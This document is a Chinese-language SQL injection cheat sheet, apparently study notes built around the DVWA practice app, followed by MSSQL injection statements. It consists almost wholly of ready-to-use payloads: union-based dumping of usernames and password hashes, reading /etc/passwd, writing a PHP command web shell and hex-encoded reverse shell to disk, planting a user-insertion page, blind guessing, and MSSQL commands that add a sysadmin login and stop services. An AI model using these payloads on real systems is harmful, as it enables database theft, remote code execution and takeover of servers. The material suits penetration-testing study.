基于布尔的检测
• 1’ and ‘1’=‘1 / 1’and ‘1
• 1’ and ‘1’=‘2 / 1’and ‘0
看查询几个字段:
• ‘ order by 9-- (-- )是查询字段
联合查询:
• ’ union select 1,2--+ 看第一个字段和第二个字段名称
• ’ union all select database(),2--+
Select … from … where id=’ ‘union selectuser(),version()-- ’显示root用户账号及数据库版本
Select … from … where id=’ ‘union selectuser(),database()-- ’显示数据库名称
Select … from … where id=’ ‘union selectuser(),@@datadir-- ’显示数据库路径
Select … from … where id=’ ‘union selectuser(),@@hostname-- ’显示机器主机名
CHAR()-- 将括号中的东西转化为ascii码的形式
CONCAT()将括号中的字段连接
MD5(‘ ’)—将括号里的东西转化为MD5值
Substring_index(user(),”@,1)将user()从@切分,留第一段
统计库中表的数量
• ‘ union select table_name,table_schemafrom information_schema.tables--+
•' UNION select table_schema,count(*) FROMinformation_Schema.tables group
by table_schema --
查询dvwa库中的表名
•'union select table_name,table_schema from information_schema.tableswhere table_schema='dvwa'--+
查询users表中的所有列(user_id,first_name̵,last_name̵,user,passwor,davatar)
•' union select table_name,column_name from information_schema.columnswhere table_schema='dvwa' and table_name='users’--+
查询user和password列中的所有内容
• ' union select user,password from dvwa.users--+
• ' union select user,password fromusers--+
• ' union select null,concat(user,0x3a,password) from users--+
读取文件
• ' union SELECT null, load_file('/etc/passwd')--+
写入文件(与文件包含漏洞配合实现提shell)
• ' union select null,"<?phppassthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/ www/a.php"--+
对写入的php代码进行16进制编码:
• cat php-revers-shell.php | xxd -ps | tr-d ‘\n’
• ' union select null, (0x3c3f706870) INTODUMPFILE '/tmp/x.php'—
脱裤:
• ' union select null, concat(user,0x3a,password) from users INTOOUTFILE '/ tmp/a.db'-
小思路:写一个服务器代码,进行添加用户操作:
' union select null,'<?php if(isset($_POST["submit"])) { $userID = $_POST["userID"]; $first_name = $_POST["first_name"]; $last_name = $_POST["last_name"]; $username = $_POST["username"]; $avatar = $_POST["avatar"]; echo "userID: $userID<BR>"; echo "first_name: $first_name<BR>"; echo "last_name: $last_name<BR>"; echo "username: $username<BR>"; echo "avatar: $avatar<BR>"; $con=mysqli_connect("127.0.0.1","root","","dvwa"); if (mysqli_connect_errno()) { echo "Failed to connect to MySQL: " . mysqli_connect_error(); } else { echo "Connected to database<BR>"; } $password = "123"; $sql="insert into dvwa.users values (\\"$userID\\",\ \"$first_name\\",\\"$last_name\\",\\"$username\\",MD5(\\"$password\\"),\\"$avatar\ \")"; if (mysqli_query($con,$sql)) { echo "[Successful Insertion]: $sql"; } else { echo "Error creating database: " . mysqli_error($con); } mysqli_close($con); } ?> <form method="post" action="<?php echo $_SERVER["PHP_SELF"]; ?>"> <input type="text" name="userID" value="33"><br> <input type="text" name="first_name" value="fh"><br> <input type="text" name="last_name" value="y"><br> <input type="text" name="username" value="yfh"><br> <input type="text" name="avatar" value="yfh!"><br> <input type="submit" name="submit" value="Submit Form"><br> </form>' INTO DUMPFILE '/tmp/user.php' –
服务器拒绝order by、union语句时,可用下列语句注入:
‘ and column is null--+ 替换column字段可猜测列名
若有一列是user:
‘ and table.user is null--+ 替换table字段可猜测表名
‘ and(select dvwa from table)>0--+ 替换table可猜测库里其他表
‘ and user.user is null--+ 判断user列是不是user表里的
‘ or user= ’admin 判断字段
‘ or user like= ’ %a% 检索user中带有a的字段
‘ or user=’admin’ and password=’……. 猜密码
PS:Kali中md5sum 1.txt可以将字典转化为md5值
若没有报错信息,则需要Sql盲注:
1’ and 1=1--+ 如果执行了,存在sql注入漏洞
1‘ and column is not null--+
mssql常用注入语句:
and exists(select * from sysobjects) //判断是否是MSSQL
and exists(select * from tableName) //判断某表是否存在..tableName为表名
and 1=(select @@VERSION) //MSSQL版本
and 1=(select db_name()) //当前数据库名
and 1=(select @@servername) //本地服务名
and 1=(select IS_SRVROLEMEMBER('sysadmin')) //判断是否是系统管理员
and 1=(Select IS_MEMBER('db_owner')) //判断是否是库权限
and 1= (Select HAS_DBACCESS('master')) //判断是否有库读取权限
and 1=(select name from master.dbo.sysdatabases where dbid=1) //暴库名DBID为1,2,3....
;declare @d int //是否支持多行
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') //判断XP_CMDSHELL是否存在
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread') //查看XP_regread扩展存储过程是不是已经被删除
添加和删除一个SA权限的用户test:(需要SA权限)
exec master.dbo.sp_addlogin test,password
exec master.dbo.sp_addsrvrolemember test,sysadmin
停掉或激活某个服务。 (需要SA权限)
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
暴网站目录
create table labeng(lala nvarchar(255), id int)
DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into labeng(lala) values(@result);
and 1=(select top 1 lala from labeng) 或者and 1=(select count(*) from labeng where lala>1)